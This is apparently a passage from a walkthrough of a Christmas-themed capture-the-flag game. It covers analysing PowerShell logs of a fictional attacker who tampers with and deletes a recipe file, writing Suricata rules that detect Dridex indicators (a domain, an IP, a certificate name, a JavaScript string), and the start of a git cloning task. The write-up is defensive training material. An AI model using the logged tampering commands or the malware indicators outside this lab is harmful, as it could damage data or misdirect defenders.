&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -iE &lt;span class="s1"&gt;&amp;#39;ScriptBlockText.*recipe&amp;#39;&lt;/span&gt; powershell.json
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;echo \&amp;quot;Dec 18 2022 `nLembanh! Santa wants us to try making some this year. We searched everywhere for this recipe that&amp;#39;s supposed to have the secret ingredient to really make it authentic. It&amp;#39;s gonna be delicious, I&amp;#39;m so excited!\&amp;quot; &amp;gt;&amp;gt; mydiary.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_ -replace &amp;#39;honey&amp;#39;, &amp;#39;fish oil&amp;#39;} $foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;} $foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_ -replace &amp;#39;honey&amp;#39;, &amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;del .\\Recipe.txt&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;del .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Therefore, the answer is &lt;code&gt;Yes&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;7. Was the original file (from question 2) deleted (Yes/No)?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The file from question 2 was called &lt;code&gt;Recipe&lt;/code&gt; (no &lt;code&gt;.txt&lt;/code&gt;). It does
not appear to have been deleted, so the answer is &lt;code&gt;No&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;8. What is the Event ID of the logs that show the actual command lines the
attacker typed and ran?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's see the ID associated with events with a &lt;code&gt;ScriptBlockText&lt;/code&gt;
attribute:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -E &lt;span class="s1"&gt;&amp;#39;ScriptBlockText|EventID&amp;#39;&lt;/span&gt; powershell.json &lt;span class="p"&gt;|&lt;/span&gt; grep -A &lt;span class="m"&gt;1&lt;/span&gt; ScriptBlockText &lt;span class="p"&gt;|&lt;/span&gt; grep EventID &lt;span class="p"&gt;|&lt;/span&gt; sort -u
&lt;span class="go"&gt;      &amp;quot;EventID&amp;quot;: 4104,&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;First, we extract the attributes &lt;code&gt;ScriptBlockText&lt;/code&gt; and &lt;code&gt;EventID&lt;/code&gt;.
Then we &lt;code&gt;grep&lt;/code&gt; for &lt;code&gt;ScriptBlockText&lt;/code&gt; and the line after. This
should give us the associated &lt;code&gt;EventID&lt;/code&gt;. We'll then &lt;code&gt;grep&lt;/code&gt; for
only the &lt;code&gt;EventID&lt;/code&gt;, and get the unique result: &lt;code&gt;4104&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;9. Is the secret ingredient compromised (Yes/No)?
10. What is the secret ingredient?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can easily answer the two last questions by taking a look at the results
from our trusty one-liner:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -iE &lt;span class="s1"&gt;&amp;#39;ScriptBlockText.*recipe&amp;#39;&lt;/span&gt; powershell.json
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;echo \&amp;quot;Dec 18 2022 `nLembanh! Santa wants us to try making some this year. We searched everywhere for this recipe that&amp;#39;s supposed to have the secret ingredient to really make it authentic. It&amp;#39;s gonna be delicious, I&amp;#39;m so excited!\&amp;quot; &amp;gt;&amp;gt; mydiary.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_ -replace &amp;#39;honey&amp;#39;, &amp;#39;fish oil&amp;#39;} $foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;\n&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;} $foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;recipe_updated.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_-replace &amp;#39;honey&amp;#39;,&amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo = Get-Content .\\Recipe| % {$_ -replace &amp;#39;honey&amp;#39;, &amp;#39;fish oil&amp;#39;}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe.txt&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;$foo | Add-Content -Path &amp;#39;Recipe&amp;#39;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;cat .\\Recipe&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;del .\\Recipe.txt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;ScriptBlockText&amp;quot;: &amp;quot;del .\\recipe_updated.txt&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We see that the word &lt;code&gt;honey&lt;/code&gt; was replaced with &lt;code&gt;fish oil&lt;/code&gt;.
Therefore, the most likely scenario is that honey is the secret ingredient, but
Grinchum replaced it with fish oil in the recipe.&lt;/p&gt;
&lt;p&gt;The fish oil must be what attracted the Snowrog.&lt;/p&gt;
&lt;img alt="Dusty Giftwrap, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/dustygiftwrap.png" /&gt;
&lt;p&gt;&lt;em&gt;Dusty Giftwrap says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Say, you did it! Thanks a million!&lt;/p&gt;
&lt;p&gt;Now we can mix in the proper ingredients and stop attracting the Snowrog!&lt;/p&gt;
&lt;p&gt;I'm all set now! Can you help Fitzy over there wield the exalted Suricata?&lt;/p&gt;
&lt;p&gt;It can be a bit mystifying at first, but this &lt;a class="reference external" href="https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html"&gt;Suricata Tome&lt;/a&gt;
should help you fathom it.&lt;/p&gt;
&lt;p&gt;I sure hope you can make it work!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="suricata-regatta"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id6"&gt;Suricata Regatta&lt;/a&gt;&lt;/h3&gt;
&lt;img alt="Dusty Giftwrap is an elf with almond-shaped eyes, a beard and glorious mustache. He's wearing a white shirt, with a brown skirt and suspenders, and black shoes. He's wearing a turquoise Christmas hat." class="align-center" src="/images/sans-christmas-challenge-2022/fitzyshortstack.png" /&gt;
&lt;p&gt;&lt;em&gt;Fitzy Shortstack says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hm?.. Hello...&lt;/p&gt;
&lt;p&gt;Sorry, I don't mean to be uncharaceristically short with you.&lt;/p&gt;
&lt;p&gt;There's just this abominable Snowrog here, and I'm trying to comprehend
Suricata to stop it from getting into the kitchen.&lt;/p&gt;
&lt;p&gt;I believe that if I can phrase these Suricata incantations correctly,
they'll create a spell that will generate warnings.&lt;/p&gt;
&lt;p&gt;And hopefully those warnings will scare off the Snowrog!&lt;/p&gt;
&lt;p&gt;Only... I'm quite baffled. Maybe you can give it a go?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And indeed, we see the Snowrog barring the way:&lt;/p&gt;
&lt;img alt="The Snowrog is a giant anthropomorphic snow monster. It's a basically a snow Balrog." class="align-center" src="/images/sans-christmas-challenge-2022/snowrog.png" /&gt;
&lt;p&gt;&lt;em&gt;The Snowrog says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Fierce gusts of wind wreath about it and snow swirls in its aura&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Its frozen mane shimmers, and chilled air fogs behind it&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Its left hand made of fingers of tongue-affixing icicles&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Its right a fist like that of a densely packed snowball&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;The Snowrog focuses on you with an icy-cold glare&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;And bellows a roar more thunderous than an avalanche&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's get rid of it!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Use your investigative analysis skills and the suspicious.pcap file to help develop Suricata rules for the elves!

There&amp;#39;s a short list of rules started in suricata.rules in your home directory.

First off, the STINC (Santa&amp;#39;s Team of Intelligent Naughty Catchers) has a lead for us.
They have some Dridex indicators of compromise to check out.
&lt;span class="hll"&gt;First, please create a Suricata rule to catch DNS lookups for adv.epostoday.uk.
&lt;/span&gt;&lt;span class="hll"&gt;Whenever there&amp;#39;s a match, the alert message (msg) should read Known bad DNS lookup, possible Dridex infection.
&lt;/span&gt;Add your rule to suricata.rules

Once you think you have it right, run ./rule_checker to see how you&amp;#39;ve done!
As you get rules correct, rule_checker will ask for more to be added.

If you want to start fresh, you can exit the terminal and start again or cp suricata.rules.backup suricata.rules

Good luck, and thanks for helping save the North Pole!
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I don't use Suricata in my day-to-day work. To create the rules, you can take
inspiration from the previous rules in the &lt;code&gt;suricata.rules&lt;/code&gt; file, or look
at &lt;a class="reference external" href="https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html"&gt;the documentation&lt;/a&gt;.
It seems to be important to have a unique &lt;code&gt;sid&lt;/code&gt; for each created rule,
so keep that in mind.&lt;/p&gt;
&lt;p&gt;Let's create the DNS rule:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;alert dns any any -&amp;gt; any any (msg:&amp;quot;Known bad DNS lookup, possible Dridex infection&amp;quot;; dns.query; content:&amp;quot;adv.epostoday.uk&amp;quot;; nocase; sid:1337;)
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we can run the rule checker:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@703ea04f1883:~$&lt;/span&gt; ./rule_checker
&lt;span class="go"&gt;3/1/2023 -- 14:26:55 - &amp;lt;Notice&amp;gt; - This is Suricata version 6.0.8 RELEASE running in USER mode&lt;/span&gt;
&lt;span class="go"&gt;3/1/2023 -- 14:26:55 - &amp;lt;Notice&amp;gt; - all 5 packet processing threads, 4 management threads initialized, engine started.&lt;/span&gt;
&lt;span class="go"&gt;3/1/2023 -- 14:26:55 - &amp;lt;Notice&amp;gt; - Signal Received.  Stopping engine.&lt;/span&gt;
&lt;span class="go"&gt;3/1/2023 -- 14:26:55 - &amp;lt;Notice&amp;gt; - Pcap-file module read 1 files, 5172 packets, 3941260 bytes&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;First rule looks good!&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;STINC thanks you for your work with that DNS record! In this PCAP, it points to 192.185.57.242.&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Develop a Suricata rule that alerts whenever the infected IP address 192.185.57.242 communicates with internal systems over HTTP.&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;When there&amp;#39;s a match, the message (msg) should read Investigate suspicious connections, possible Dridex infection&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Our first rule seems correct, and we must now write a second one that creates
an alert when HTTP communications occur with &lt;code&gt;192.185.57.242&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;alert http 192.185.57.242 any -&amp;gt; $HOME_NET any (msg:&amp;quot;Investigate suspicious connections, possible Dridex infection&amp;quot;;sid:1338;)
alert http $HOME_NET any -&amp;gt; 192.185.57.242 any (msg:&amp;quot;Investigate suspicious connections, possible Dridex infection&amp;quot;;sid:1339;)
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's check our new rules:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@703ea04f1883:~$&lt;/span&gt; ./rule_checker
&lt;span class="go"&gt;3/1/2023 -- 14:31:06 - &amp;lt;Notice&amp;gt; - This is Suricata version 6.0.8 RELEASE running in USER mode&lt;/span&gt;
&lt;span class="go"&gt;3/1/2023 -- 14:31:06 - &amp;lt;Notice&amp;gt; - all 5 packet processing threads, 4 management threads initialized, engine started.&lt;/span&gt;
&lt;span class="go"&gt;3/1/2023 -- 14:31:06 - &amp;lt;Notice&amp;gt; - Signal Received.  Stopping engine.&lt;/span&gt;
&lt;span class="go"&gt;3/1/2023 -- 14:31:07 - &amp;lt;Notice&amp;gt; - Pcap-file module read 1 files, 5172 packets, 3941260 bytes&lt;/span&gt;
&lt;span class="go"&gt;First rule looks good!&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;Second rule looks good!&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;We heard that some naughty actors are using TLS certificates with a specific CN.&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Develop a Suricata rule to match and alert on an SSL certificate for heardbellith.Icanwepeh.nagoya.&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;When your rule matches, the message (msg) should read Investigate bad certificates, possible Dridex infection&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's the corresponding Suricata rule:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;alert tls any any -&amp;gt; any any (msg:&amp;quot;Investigate bad certificates, possible Dridex infection&amp;quot;; tls.cert_subject; content:&amp;quot;heardbellith.Icanwepeh.nagoya&amp;quot;; nocase;sid:1340;)
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's check it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@703ea04f1883:~$&lt;/span&gt; ./rule_checker
&lt;span class="go"&gt;3/1/2023 -- 14:32:38 - &amp;lt;Notice&amp;gt; - This is Suricata version 6.0.8 RELEASE running in USER mode&lt;/span&gt;
&lt;span class="go"&gt;3/1/2023 -- 14:32:38 - &amp;lt;Notice&amp;gt; - all 5 packet processing threads, 4 management threads initialized, engine started.&lt;/span&gt;
&lt;span class="go"&gt;3/1/2023 -- 14:32:38 - &amp;lt;Notice&amp;gt; - Signal Received.  Stopping engine.&lt;/span&gt;
&lt;span class="go"&gt;3/1/2023 -- 14:32:38 - &amp;lt;Notice&amp;gt; - Pcap-file module read 1 files, 5172 packets, 3941260 bytes&lt;/span&gt;
&lt;span class="go"&gt;First rule looks good!&lt;/span&gt;

&lt;span class="go"&gt;Second rule looks good!&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;Third rule looks good!&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;OK, one more to rule them all and in the darkness find them.&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Let&amp;#39;s watch for one line from the JavaScript: let byteCharacters = atob&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;Oh, and that string might be GZip compressed - I hope that&amp;#39;s OK!&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;Just in case they try this again, please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We're told that the content might be compressed using GZip. Luckily, according
to &lt;a class="reference external" href="https://suricata.readthedocs.io/en/suricata-6.0.0/rules/http-keywords.html#id1"&gt;Suricata's documentation&lt;/a&gt;,
using &lt;code&gt;http.response_body&lt;/code&gt; allows to match on GZipped-content:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;alert http any any -&amp;gt; any any (msg:&amp;quot;Suspicious JavaScript function, possible Dridex infection&amp;quot;;http.response_body; content:&amp;quot;let byteCharacters = atob&amp;quot;; sid:1341;)
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;One last time:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@703ea04f1883:~$&lt;/span&gt; ./rule_checker
&lt;span class="go"&gt;3/1/2023 -- 14:42:38 - &amp;lt;Notice&amp;gt; - This is Suricata version 6.0.8 RELEASE running in USER mode&lt;/span&gt;
&lt;span class="go"&gt;3/1/2023 -- 14:42:38 - &amp;lt;Notice&amp;gt; - all 5 packet processing threads, 4 management threads initialized, engine started.&lt;/span&gt;
&lt;span class="go"&gt;3/1/2023 -- 14:42:38 - &amp;lt;Notice&amp;gt; - Signal Received.  Stopping engine.&lt;/span&gt;
&lt;span class="go"&gt;3/1/2023 -- 14:42:38 - &amp;lt;Notice&amp;gt; - Pcap-file module read 1 files, 5172 packets, 3941260 bytes&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;First rule looks good!&lt;/span&gt;
&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Second rule looks good!&lt;/span&gt;
&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Third rule looks good!&lt;/span&gt;
&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Fourth rule looks good! You&amp;#39;ve done it - thank you!&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This gives us our first ring, the Tolkien Ring:&lt;/p&gt;
&lt;img alt="The Tolkien Ring. It's a simple golden ring, like the one from Lord of the Rings, etched with a network diagram resembling a token ring network." class="align-center" src="/images/sans-christmas-challenge-2022/tolkien_ring.png" /&gt;
&lt;img alt="Dusty Giftwrap, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/fitzyshortstack.png" /&gt;
&lt;p&gt;&lt;em&gt;Fitzy Shortstack says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Woo hoo - you wielded Suricata magnificently! Thank you!&lt;/p&gt;
&lt;p&gt;Now to shout the final warning of power to the Snowrog...&lt;/p&gt;
&lt;p&gt;YOU...SHALL NOT...PASS!!!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And with that, the Snowrog disapears! As we leave, we see Grinchum:&lt;/p&gt;
&lt;img alt="Grinchum is now frowning." class="align-center" src="/images/sans-christmas-challenge-2022/smeagolmad1.png" /&gt;
&lt;p&gt;&lt;em&gt;Grinchum says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;😒 &lt;em&gt;Who took you, Precious? How did they take you? Mustn't happen again.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;🙂 &lt;strong&gt;Oh, hello, humanses. Maybe we can offer help?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;😏 &lt;strong&gt;Yes... Grinchum will help the humanses.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;We are trying to distract them from finding the rest of you, Preciouses,
with talk of hints and coinses.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;🙂 &lt;strong&gt;Have you found the coffers yet? The ones at the end of hidden paths?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;😏 &lt;strong&gt;There's hintses in them, and coinses, they're veeerrryy special.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;🙂 &lt;strong&gt;Just look hard, for little, bitty, speckles or other oddities.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Don't worry, they will not look for you, Preciouses. Shhh...&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;🙂 &lt;strong&gt;Go on, humanses. Start searching!&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="recover-the-elfen-ring"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id7"&gt;Recover the Elfen Ring&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We keep making our way down where we find Morcel Nougat. He teaches us about
another kind of people, the &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Hobbit"&gt;Flobbits&lt;/a&gt;.&lt;/p&gt;
&lt;img alt="Morcel Nougat is an elf with slanted eyes, with a beard on his chin and a mustache. He's wearing a white T-Shirt, brown-greenish pants, dark green shoes, and a yellow Christmas hat." class="align-center" src="/images/sans-christmas-challenge-2022/morcelnougat.png" /&gt;
&lt;p&gt;&lt;em&gt;Morcel Nougat says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hello, I'm Morcel Nougat, elf extraordinaire!&lt;/p&gt;
&lt;p&gt;I was in the first group of elves that started digging into the snow.&lt;/p&gt;
&lt;p&gt;Eventually, we burrowed deep enough that we came upon an already existing
tunnel network.&lt;/p&gt;
&lt;p&gt;As we explored it, we encountered a people that claimed to be the Flobbits.&lt;/p&gt;
&lt;p&gt;We were all astonished, because we learn a little about the Flobbits in
history class, but nobody's ever seen them.&lt;/p&gt;
&lt;p&gt;They were part of the Great Schism hundreds of years ago that split the
Munchkins and the Elves.&lt;/p&gt;
&lt;p&gt;Not much else was known, until we met them in the tunnels! Turns out, their
exodus took them to Middle Earth.&lt;/p&gt;
&lt;p&gt;They only appear when the 5 Rings are in jeopardy. Though, the Rings
weren't lost until after we started digging. Hmm...&lt;/p&gt;
&lt;p&gt;Anyways, be careful as you venture down further. I hear something sinister
is in the depths of these tunnels.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="section" id="clone-with-a-difference"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id8"&gt;Clone with a Difference&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We keep going, take a boat, and meet Bow Ninecandle:&lt;/p&gt;
&lt;img alt="Bow Ninecandle is an elf wearing a white T-Shirt, brown-greenish pants, dark blue shoes, and a purple Christmas hat. He's smiling from ear to ear." class="align-center" src="/images/sans-christmas-challenge-2022/bowninecandle.png" /&gt;
&lt;p&gt;&lt;em&gt;Bow Ninecandle says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Well hello! I'm Bow Ninecandle!&lt;/p&gt;
&lt;p&gt;Have you ever used Git before? It's so neat!&lt;/p&gt;
&lt;p&gt;It adds so much convenience to DevOps, like those times when a new person
joins the team.&lt;/p&gt;
&lt;p&gt;They can just clone the project, and start helping out right away!&lt;/p&gt;
&lt;p&gt;Speaking of, maybe you could help me out with cloning this repo?&lt;/p&gt;
&lt;p&gt;I've heard there's multiple methods, but I only know how to do one.&lt;/p&gt;
&lt;p&gt;If you need more help, check out the &lt;a class="reference external" href="https://youtu.be/vIQY_FH1SVk"&gt;panel of very senior DevOps experts.&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's give him a hand:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;We just need you to clone one repo: git clone git@haugfactory.com:asnowball/aws_scripts.git
This should be easy, right?

Thing is: it doesn&amp;#39;t seem to be working for me. This is a public repository though. I&amp;#39;m so confused!

Please clone the repo and cat the README.md file.
